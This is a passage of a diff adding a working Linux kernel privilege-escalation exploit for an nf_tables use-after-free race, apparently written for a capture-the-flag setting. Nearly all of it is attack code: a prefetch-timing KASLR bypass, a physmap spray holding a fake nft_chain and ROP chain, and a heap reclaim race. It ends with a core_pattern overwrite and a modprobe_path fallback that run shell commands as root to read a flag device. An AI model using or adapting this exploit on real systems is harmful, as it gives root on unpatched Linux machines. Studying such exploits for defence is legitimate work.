fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd >= 0) { + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP|IFF_RUNNING; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + } +} + +/* forward declaration for pin_cpu */ +static void pin_cpu(int cpu); + +/* ========== KASLR bypass (prefetch timing) ========== */ +// @step(name="KASLR Bypass via Entrybleed") +#ifdef __x86_64__ + +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) { + uint64_t lo, hi; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(hi), "=r"(lo) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (hi << 32) | lo; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) { + uint64_t lo, hi; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(hi), "=r"(lo) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (hi << 32) | lo; +} + +static uint64_t time_prefetch(const void *p, int n) { + uint64_t best = ~0ULL; + for (int i = 0; i < n; i++) { + uint64_t t1 = rdtsc_begin(); + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r"(p)); + uint64_t delta = rdtsc_end() - t1; + if (delta < best) best = delta; + } + return best; +} + +// @step(name="KASLR Leak: Detect kbase") +static uint64_t leak_detect_kbase(void) { + #define KB_START 0xffffffff81000000ULL + #define KB_END 0xffffffffD0000000ULL + #define KB_COARSE 0x1000000ULL /* 16MB */ + #define KB_FINE 0x200000ULL /* 2MB */ + #define KB_VOTES 7 + + /* Phase 1: coarse scan (16MB steps) */ + printf("[*] kbase: coarse scan (16MB steps, %d votes)...\n", KB_VOTES); + uint64_t coarse = KB_START; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + int naddr = static_cast((KB_END - KB_START) / KB_COARSE); + uint64_t best_t = ~0ULL, best_a = KB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = KB_START + KB_COARSE * static_cast(ti); + uint64_t t = time_prefetch(reinterpret_cast(addr), KB_COARSE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + /* Boyer-Moore majority vote */ + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] kbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { + coarse = cand; + break; + } + printf("[*] kbase: retrying coarse scan...\n"); + } + + /* Phase 2: fine scan (2MB steps around coarse result) */ + printf("[*] kbase: fine scan (2MB steps around %#lx)...\n", + (unsigned long)coarse); + uint64_t fine_start = (coarse > KB_START + KB_COARSE) ? + coarse - KB_COARSE : KB_START; + uint64_t fine_end = coarse + 2 * KB_COARSE; + if (fine_end > KB_END) fine_end = KB_END; + + uint64_t result = coarse; + for (int attempt = 0; attempt < 3; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += KB_FINE) { + uint64_t t = time_prefetch(reinterpret_cast(addr), KB_FINE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] kbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { + result = cand; + break; + } + } + + return result; +} + +// @step(name="KASLR Leak: Detect phbase") +static uint64_t leak_detect_phbase(void) { + #define PB_START 0xffff888000000000ULL + #define PB_COARSE 0x4000000000ULL /* 256GB */ + #define PB_CRANGE 0x100000000000ULL /* 16TB coarse range */ + #define PB_STEP 0x40000000ULL /* 1GB */ + #define PB_VOTES 7 + + printf("[*] phbase: coarse scan (256GB steps, 16TB range, %d votes)...\n", PB_VOTES); + uint64_t coarse = PB_START; + for (int attempt = 0; attempt < 10; attempt++) { + uint64_t votes[PB_VOTES]; + int naddr = static_cast(PB_CRANGE / PB_COARSE); + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = PB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = PB_START + PB_COARSE * static_cast(ti); + uint64_t t = time_prefetch(reinterpret_cast(addr), PB_COARSE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] phbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { + coarse = cand; + break; + } + if (attempt < 9) printf("[*] phbase: retrying coarse...\n"); + } + + uint64_t fine_start = (coarse > PB_START + PB_COARSE/2) ? + coarse - PB_COARSE/2 : PB_START; + uint64_t fine_end = coarse + PB_COARSE + PB_COARSE/2; + printf("[*] phbase: fine scan (1GB steps, %#lx-%#lx)...\n", + (unsigned long)fine_start, (unsigned long)fine_end); + + uint64_t result = coarse; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[PB_VOTES]; + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += PB_STEP) { + uint64_t t = time_prefetch(reinterpret_cast(addr), PB_COARSE_TIMING); + if (t < best_t) { + best_t = t; + best_a = addr; + } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; + int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { + cand = votes[i]; + cnt = 1; + } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) + if (votes[i] == cand) cnt++; + + printf("[*] phbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { + result = cand; + break; + } + } + + /* Apply -4GB KVM correction */ + if (result > PB_START + KVM_PH_CORRECTION) { + uint64_t corrected = result - KVM_PH_CORRECTION; + printf("[+] phbase KVM corrected: %#lx -> %#lx\n", + (unsigned long)result, (unsigned long)corrected); + result = corrected; + } + + return result; +} + +static void leak_entrybleed(void) { + pin_cpu(RACE_CPU); + + /* Detect kbase */ + uint64_t kb = leak_detect_kbase(); + eb_kbases[0] = kb; + eb_nkb = 1; + kbase = kb; + printf("[+] kbase=%#lx\n", (unsigned long)kbase); + + /* Store coarse +-16MB as alternative candidates */ + if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb - KB_COARSE; + if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb + KB_COARSE; + + /* Skip phbase detection -- not needed for __init_begin approach */ + phbase = 0xffff888000000000ULL; + eb_phbases[0] = phbase; + eb_npb = 1; +} +#else +static void leak_entrybleed(void) { die("x86_64 only"); } +#endif + +/* ========== physmap (MAP_SHARED for post-fork updates) ========== */ +// @step(name="Physmap Spray with Fake Chain + ROP Blob") +static void spray_physmap(void) { + size_t sz = static_cast(physmap_mb) << 20; + phys_region = mmap(nullptr, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +// @step(name="Leak Physmap KVA via Pagemap") +static uint64_t leak_physmap_kva(void) { + int fd = open("/proc/self/pagemap", O_RDONLY); + if (fd < 0) return 0; + uint64_t entry = 0; + pread(fd, &entry, 8, static_cast((reinterpret_cast(phys_region)) / 4096) * 8); + close(fd); + if (!(entry & (1ULL << 63))) return 0; + uint64_t pfn = entry & ((1ULL << 55) - 1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Fill every physmap page with the fake chain + ROP blob. + * + * Page layout (4096 bytes): + * +0x000: Fake nft_chain (96 bytes) + * +0x080: Fake nft_rule_blob (variable size, XDK-generated ROP words) + * +0x300: Name string "x\0" + * + * ROP words are generated by kernelXDK (WRITE_WHAT_WHERE_64 + MSLEEP) + * and serialized into nft_immediate_eval expressions that write 16-byte + * chunks into nft_do_chain's return-address region via dreg. + */ +static uint64_t pack_u64_le(const char *src, size_t len) { + uint64_t word = 0; + memcpy(&word, src, len); + return word; +} + +static const char *pick_flag_device(void) { + if (access("/dev/vdb", R_OK) == 0) + return "/dev/vdb"; + if (access("/dev/vda", R_OK) == 0) + return "/dev/vda"; + return "/dev/vdb"; +} + +static std::vector build_xdk_postrip_words(uint64_t core_pattern) { + char payload[64]; + const char *flag_dev = pick_flag_device(); + int n = snprintf(payload, sizeof(payload), + "|/bin/dd if=%s of=/dev/ttyS0", flag_dev); + if (n < 0 || static_cast(n) >= sizeof(payload)) + die("snprintf core_pattern payload"); + size_t payload_len = strlen(payload) + 1; + printf("[*] core_pattern payload device: %s\n", flag_dev); + + if (!g_xdk_target) + die("kernelXDK post-RIP target unavailable"); + + RopChain rop(*g_xdk_target, kbase); + + for (size_t off = 0; off < payload_len; off += 8) { + size_t rem = payload_len - off; + size_t n = rem < 8 ? rem : 8; + uint64_t chunk = pack_u64_le(payload + off, n); + /* kernelXDK WRITE_WHAT_WHERE_64 expects {where, what}. */ + rop.AddRopAction(RopActionId::WRITE_WHAT_WHERE_64, + {core_pattern + off, chunk}); + } + rop.AddRopAction(RopActionId::MSLEEP, {MSLEEP_FOREVER}); + std::vector words = rop.GetDataWords(); + if (words.empty()) { + fprintf(stderr, "[!] xdk: generated empty post-RIP chain\n"); + _exit(1); + } + return words; +} + +static void emit_nft_immediate_expr(uint8_t *expr, uint64_t nft_imm_ops, + uint8_t dreg, uint64_t lo, uint64_t hi) { + memset(expr, 0, 32); + memcpy(expr, &nft_imm_ops, 8); + memcpy(expr + 8, &lo, 8); + memcpy(expr + 16, &hi, 8); + expr[24] = dreg; + expr[25] = DREG_EXPR_LEN; +} + +static void rop_fill_physmap(void) { + uint64_t nft_imm_ops = kbase + off_nft_imm_ops; + uint64_t core_pattern = kbase + off_core_pattern; + std::vector rop_words = build_xdk_postrip_words(core_pattern); + size_t expr_count = (rop_words.size() + 1) / 2; + uint64_t blob_size = 16 + expr_count * 32; + size_t blob_footprint = 8 + blob_size; + + if (BLOB_OFFSET + blob_footprint > NAME_OFFSET) { + fprintf(stderr, + "[!] XDK ROP blob (%zu bytes) overlaps name area\n", + blob_footprint); + _exit(1); + } + + uint8_t page[4096]; + memset(page, 0, sizeof(page)); + + /* ---- Fake nft_chain at page+0 ---- */ + uint64_t blob_ptr = g_page_kva + BLOB_OFFSET; + memcpy(page + NFT_CHAIN_OFFS_BLOB0, &blob_ptr, 8); + memcpy(page + NFT_CHAIN_OFFS_BLOB1, &blob_ptr, 8); + uint64_t tbl = kbase; + memcpy(page + NFT_CHAIN_OFFS_TABLE, &tbl, 8); + uint32_t use = 1; + memcpy(page + NFT_CHAIN_OFFS_USE, &use, 4); + page[NFT_CHAIN_OFFS_FLAGS] = 0; + uint64_t name_ptr = g_page_kva + NAME_OFFSET; + memcpy(page + NFT_CHAIN_OFFS_NAME, &name_ptr, 8); + + /* ---- Name string at page+0x300 ---- */ + page[NAME_OFFSET] = 'x'; + page[NAME_OFFSET+1] = 0; + + /* ---- Fake nft_rule_blob at page+0x80 ---- */ + uint8_t *blob = page + BLOB_OFFSET; + memcpy(blob, &blob_size, 8); + + /* First rule_dp: dlen = expr_count * 32, is_last = 0 */ + uint64_t rdp = static_cast(expr_count * 32) << 1; + memcpy(blob + 8, &rdp, 8); + + for (size_t i = 0; i < expr_count; i++) { + uint64_t lo = rop_words[i * 2]; + uint64_t hi = (i * 2 + 1 < rop_words.size()) ? rop_words[i * 2 + 1] : 0; + emit_nft_immediate_expr(blob + 16 + i * 32, nft_imm_ops, + DREG_RET + static_cast(i * 4), + lo, hi); + } + + /* Terminator rule_dp at blob+blob_size: is_last=1 */ + uint64_t term = 1; + memcpy(blob + blob_size, &term, 8); + + /* Fill all physmap pages */ + size_t sz = static_cast(physmap_mb) << 20; + for (size_t o = 0; o < sz; o += 4096) + memcpy(static_cast(phys_region) + o, page, sizeof(page)); + printf("[+] physmap filled with XDK ROP chain (%zu qwords, kva=%#lx)\n", + rop_words.size(), (unsigned long)g_page_kva); +} + +/* ========== in-batch spray: NEWTABLE userdata for kmalloc-cg-64 ========== */ +// @step(name="In-batch NEWTABLE Userdata Spray") +/* + * Build spray userdata (52 bytes) that overlays a freed nft_hash_elem. + * + * Object layout (kmalloc-cg-64, element with key_len=4 verdict map): + * +0: hlist_node.next (8B) - reader already past this + * +8: hlist_node.pprev (8B) - reader already past this + * +16: ext.genmask (1B) = 0 (active) + * +17: ext.offset[KEY] (1B) = 16 (KEY at ext+16 = obj+32) + * +18: ext.offset[1] (1B) = 0 + * +19: ext.offset[DATA] (1B) = 20 (DATA at ext+20 = obj+36) + * +32: KEY data (4B) = htonl(KEY_RACE) + * +36: verdict.code (4B) = NFT_GOTO + * +40: verdict padding (4B) = 0 + * +44: verdict.chain (8B) = physmap fake chain KVA + */ +static void spray_build_udata(uint8_t udata[SPRAY_UDATA_LEN], uint64_t chain_kva) { + memset(udata, 0, SPRAY_UDATA_LEN); + udata[NFT_HASH_ELEM_OFFS_GENMASK] = 0; /* ext.genmask = 0 (active in current generation) */ + udata[NFT_HASH_ELEM_OFFS_KEY_OFF] = 16; /* ext.offset[KEY] = 16 */ + udata[NFT_HASH_ELEM_OFFS_DATA_OFF] = 20; /* ext.offset[DATA] = 20 */ + *reinterpret_cast(udata + NFT_HASH_ELEM_OFFS_KEY) = htonl(KEY_RACE); + *reinterpret_cast(udata + NFT_HASH_ELEM_OFFS_VERDICT) = NFT_GOTO_CODE; + *reinterpret_cast(udata + NFT_HASH_ELEM_OFFS_CHAIN) = chain_kva; +} + +/* ========== nft object creation ========== */ +// @step(name="nft Object Creation") +static int vuln_setup_nft(int fd, uint32_t pid) { + uint8_t buf[65536]; + struct nlbuf nb; + nlbuf_init(&nb, buf, sizeof(buf)); + uint32_t seq = 1; + + batch_begin(&nb, seq++, pid); + + /* 1. Table */ + struct nlmsghdr *nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWTABLE), NLC, + seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_TABLE_NAME, "t"); + + /* 2. Base chain (LOCAL_OUT hook) */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWCHAIN), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_CHAIN_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_CHAIN_NAME, "bc"); + struct nlattr *hk = nlbuf_nest_start(&nb, nlh, NFTA_CHAIN_HOOK); + nl_u32be(&nb, nlh, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nl_u32be(&nb, nlh, NFTA_HOOK_PRIORITY, static_cast(NF_IP_PRI_FILTER)); + nlbuf_nest_end(&nb, hk); + + /* 3. Verdict map (hash, size=1, key_len=4) */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWSET), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_SET_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_SET_NAME, "vm"); + nl_u32be(&nb, nlh, NFTA_SET_FLAGS, NFT_SET_MAP); + nl_u32be(&nb, nlh, NFTA_SET_KEY_LEN, 4); + nl_u32be(&nb, nlh, NFTA_SET_DATA_TYPE, SET_DATA_TYPE_VERDICT); + nl_u32be(&nb, nlh, NFTA_SET_DATA_LEN, 16); + nl_u32be(&nb, nlh, NFTA_SET_ID, SET_ID_SPRAY); + nl_u32be(&nb, nlh, NFTA_SET_POLICY, NFT_SET_POL_PERFORMANCE); + struct nlattr *desc = nlbuf_nest_start(&nb, nlh, NFTA_SET_DESC); + nl_u32be(&nb, nlh, NFTA_SET_DESC_SIZE, 1); + nlbuf_nest_end(&nb, desc); + + /* 4. Fill element: key=0, verdict=NF_ACCEPT */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_KEY); + uint32_t kf = htonl(KEY_FILL); + nlbuf_put(&nb, nlh, NFTA_DATA_VALUE, &kf, 4); + nlbuf_nest_end(&nb, kn); + struct nlattr *dn = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_DATA); + struct nlattr *vn = nlbuf_nest_start(&nb, nlh, NFTA_DATA_VERDICT); + nl_u32be(&nb, nlh, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&nb, vn); + nlbuf_nest_end(&nb, dn); + nlbuf_nest_end(&nb, el); + nlbuf_nest_end(&nb, els); + + /* 5. Rule: immediate(KEY_RACE) + lookup(vm) */ + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWRULE), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&nb, nlh, NFTA_RULE_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_RULE_CHAIN, "bc"); + struct nlattr *exs = nlbuf_nest_start(&nb, nlh, NFTA_RULE_EXPRESSIONS); + { + struct nlattr *ee = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + nl_strz(&nb, nlh, NFTA_EXPR_NAME, "immediate"); + struct nlattr *ed = nlbuf_nest_start(&nb, nlh, NFTA_EXPR_DATA); + nl_u32be(&nb, nlh, NFTA_IMMEDIATE_DREG, NFT_REG32_00); + struct nlattr *id = nlbuf_nest_start(&nb, nlh, NFTA_IMMEDIATE_DATA); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&nb, nlh, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&nb, id); + nlbuf_nest_end(&nb, ed); + nlbuf_nest_end(&nb, ee); + } + { + struct nlattr *ee = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + nl_strz(&nb, nlh, NFTA_EXPR_NAME, "lookup"); + struct nlattr *ed = nlbuf_nest_start(&nb, nlh, NFTA_EXPR_DATA); + nl_strz(&nb, nlh, NFTA_LOOKUP_SET, "vm"); + nl_u32be(&nb, nlh, NFTA_LOOKUP_SREG, NFT_REG32_00); + nl_u32be(&nb, nlh, NFTA_LOOKUP_DREG, NFT_REG_VERDICT); + nlbuf_nest_end(&nb, ed); + nlbuf_nest_end(&nb, ee); + } + nlbuf_nest_end(&nb, exs); + + batch_end(&nb, seq++, pid); + + if (nl_send(fd, nb.buf, nb.len) < 0) return -1; + return nl_wait_acks(fd, 5, 5000); +} + +/* ========== build race batch: NEWSETELEM + NEWTABLE spray interleaved ========== */ +// @step(name="Race: Build Race Batch") +static int race_build_batch(uint8_t *buf, size_t cap, uint32_t *seq, + uint32_t pid, int count, uint64_t *table_id, + const uint8_t *spray_udata) { + struct nlbuf nb; + nlbuf_init(&nb, buf, cap); + batch_begin(&nb, (*seq)++, pid); + + char tname[24]; + for (int i = 0; i < count; i++) { + /* NEWSETELEM: insert element with KEY_RACE -> err_set_full -> kfree */ + struct nlmsghdr *nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_INET, 0); + if (!nlh) break; + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&nb, nlh, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&nb, nlh, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_KEY); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&nb, nlh, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&nb, kn); + struct nlattr *dn2 = nlbuf_nest_start(&nb, nlh, NFTA_SET_ELEM_DATA); + struct nlattr *vvn = nlbuf_nest_start(&nb, nlh, NFTA_DATA_VERDICT); + nl_u32be(&nb, nlh, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&nb, vvn); + nlbuf_nest_end(&nb, dn2); + nlbuf_nest_end(&nb, el); + nlbuf_nest_end(&nb, els); + + /* NEWTABLE: spray userdata into kmalloc-cg-64 to reclaim freed slot */ + unsigned long long tid = static_cast((*table_id)++); + snprintf(tname, sizeof(tname), "s%016llx", tid); + nlh = nlbuf_begin_msg(&nb, NFT_T(NFT_MSG_NEWTABLE), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_IPV4, 0); + if (!nlh) break; + nl_strz(&nb, nlh, NFTA_TABLE_NAME, tname); + nlbuf_put(&nb, nlh, NFTA_TABLE_USERDATA, spray_udata, SPRAY_UDATA_LEN); + } + + batch_end(&nb, (*seq)++, pid); + return static_cast(nb.len); +} + +/* ========== CPU pinning ========== */ +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +/* ========== race threads ========== */ +// @step(name="Race: Writer + Packet Threads") +struct race_args { + int writer_fd; + uint32_t writer_pid; + pthread_barrier_t *bar; + uint64_t chain_kva; +}; + +static void *race_writer_thread(void *arg) { + struct race_args *a = static_cast(arg); + pin_cpu(RACE_CPU); + pthread_barrier_wait(a->bar); + + uint8_t buf[1048576]; + uint32_t seq = RACE_SEQ_START; + uint64_t table_id = (static_cast(a->writer_pid) << 32) ^ + static_cast(time(nullptr)); + uint64_t batches = 0; + + /* Build spray userdata: fake element with NFT_GOTO(physmap_chain) */ + uint8_t spray_udata[SPRAY_UDATA_LEN]; + spray_build_udata(spray_udata, a->chain_kva); + + printf("[*] writer: starting race with in-batch NEWTABLE spray (%d pairs/batch)\n", + SPRAY_BATCH_PAIRS); + + while (!g_stop) { + int len = race_build_batch(buf, sizeof(buf), &seq, a->writer_pid, + SPRAY_BATCH_PAIRS, &table_id, spray_udata); + if (len > 0) nl_send(a->writer_fd, buf, static_cast(len)); + nl_drain(a->writer_fd); + batches++; + + if (batches % WRITER_PROGRESS == 0) + printf("[*] writer: %lu batches\n", (unsigned long)batches); + } + + return nullptr; +} + +static void *race_packet_thread(void *arg) { + struct race_args *a = static_cast(arg); + pin_cpu(FLOOD_CPU); + pthread_barrier_wait(a->bar); + + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd < 0) return nullptr; + + struct sockaddr_in dst = {}; + dst.sin_family = AF_INET; + dst.sin_port = htons(UDP_PORT); + dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + char pkt[1] = {'A'}; + + connect(fd, reinterpret_cast(&dst), sizeof(dst)); + + while (!g_stop) { + for (int i = 0; i < 10000 && !g_stop; i++) { + send(fd, pkt, 1, MSG_DONTWAIT); + } + } + close(fd); + return nullptr; +} + +/* ========== core_pattern polling + SIGSEGV trigger ========== */ +// @step(name="core_pattern Overwrite Detection and Flag Exfiltration") +static int setup_check_core_pattern(void) { + int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (fd < 0) return 0; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n <= 0) return 0; + buf[n] = 0; + return strstr(buf, "/bin/dd") != nullptr; +} + +static void setup_trigger_core_dump(void) { + printf("[*] triggering core dump via SIGSEGV...\n"); + pid_t child = fork(); + if (child == 0) { + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + raise(SIGSEGV); + _exit(1); + } + if (child > 0) { + int status; + waitpid(child, &status, 0); + printf("[*] core dump child exited (sig=%d)\n", + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + } +} + +/* ========== modprobe_path fallback (for local QEMU testing) ========== */ +// @step(name="Setup Payload Scripts") +static void setup_payload(void) { + int fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + const char *s = + "#!/bin/sh\n" + "/bin/cat /dev/vdb > /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vda >> /tmp/flag 2>/dev/null\n" + "/bin/cat /flag >> /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "/bin/cat /dev/vda >> /dev/ttyS0 2>/dev/null\n" + "/bin/chmod 777 /tmp/flag 2>/dev/null\n"; + if (write(fd, s, strlen(s)) < 0) { /* ignore */ } + close(fd); + + fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + if (write(fd, "\xff\xff\xff\xff", 4) < 0) { /* ignore */ } + close(fd); +} + +// @step(name="Modprobe Fallback Trigger") +static int setup_try_modprobe(void) { + pid_t child = fork(); + if (child == 0) { + execl("/tmp/dummy", "/tmp/dummy", nullptr); + _exit(0); + } + if (child > 0) waitpid(child, nullptr, 0); + // @sleep(desc="wait for modprobe handler to execute payload script") + sleep_ms(MODPROBE_WAIT_MS); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { + buf[n] = 0; + printf("[+] FLAG:\n%s\n", buf); + return 1; + } + } + return 0; +} + +/* ========== 3D candidate generation ========== */ +// @step(name="Candidate Generation via __init_begin Page Reclaim") +static void add_cand(uint64_t kb, uint64_t pb, uint64_t kva_off) { + if (num_cands3d >= MAX_CANDS) return; + cands3d[num_cands3d++] = {kb, pb, kva_off}; +} + +static int setup_generate_timed_init_candidates(uint64_t kb, uint64_t init_size) { +#ifdef __x86_64__ + uint64_t best_t[MAX_CANDS]; + uint64_t best_key[MAX_CANDS]; + uint64_t best_off[MAX_CANDS]; + for (int i = 0; i < MAX_CANDS; i++) { + best_t[i] = ~0ULL; + best_key[i] = ~0ULL; + best_off[i] = ~0ULL; + } + + auto mix64 = [](uint64_t x) -> uint64_t { + x ^= x >> 33; + x *= 0xff51afd7ed558ccdULL; + x ^= x >> 33; + x *= 0xc4ceb9fe1a85ec53ULL; + x ^= x >> 33; + return x; + }; + + for (uint64_t off = 0; off + 0x1000 <= init_size; off += 0x1000) { + uint64_t kva = kb + off_init_begin + off; + uint64_t t = time_prefetch(reinterpret_cast(kva), 8); + /* Tie-break equal timing samples to avoid always preferring low offsets. */ + uint64_t key = mix64(off ^ 0x9e3779b97f4a7c15ULL); + + for (int i = 0; i < MAX_CANDS; i++) { + if (t > best_t[i]) continue; + if (t == best_t[i] && key >= best_key[i]) continue; + for (int j = MAX_CANDS - 1; j > i; j--) { + best_t[j] = best_t[j - 1]; + best_key[j] = best_key[j - 1]; + best_off[j] = best_off[j - 1]; + } + best_t[i] = t; + best_key[i] = key; + best_off[i] = off; + break; + } + } + + int added = 0; + for (int i = 0; i < MAX_CANDS; i++) { + if (best_off[i] == ~0ULL) continue; + add_cand(kb, 0, off_init_begin + best_off[i]); + if (num_cands3d >= MAX_CANDS) break; + added++; + } + + if (added > 0) { + printf("[*] __init timing-ranked candidates selected: %d\n", added); + for (int i = 0; i < MAX_CANDS && i < added; i++) { + printf("[*] rank %d: off=%#lx t=%lu\n", i + 1, + (unsigned long)best_off[i], (unsigned long)best_t[i]); + } + } + return added; +#else + (void)kb; + (void)init_size; + return 0; +#endif +} + +// @step(name="Generate __init_begin KVA Candidates") +static void setup_generate_candidates(void) { + uint64_t init_size = off_init_end - off_init_begin; + uint64_t kb = eb_kbases[0]; + printf("[*] __init candidates: up to %d offsets in kbase+%#lx..+%#lx\n", + MAX_CANDS, + (unsigned long)off_init_begin, (unsigned long)off_init_end); + + /* Under nokaslr, kbase is known; rank all __init pages by prefetch timing + * and try the fastest (most likely mapped/reclaimed) first. */ + if (kernel_cmdline_has_token("nokaslr")) { + int added = setup_generate_timed_init_candidates(kb, init_size); + if (added > 0) { + printf("[*] generated %d timing-ranked candidates (budget=%ds, 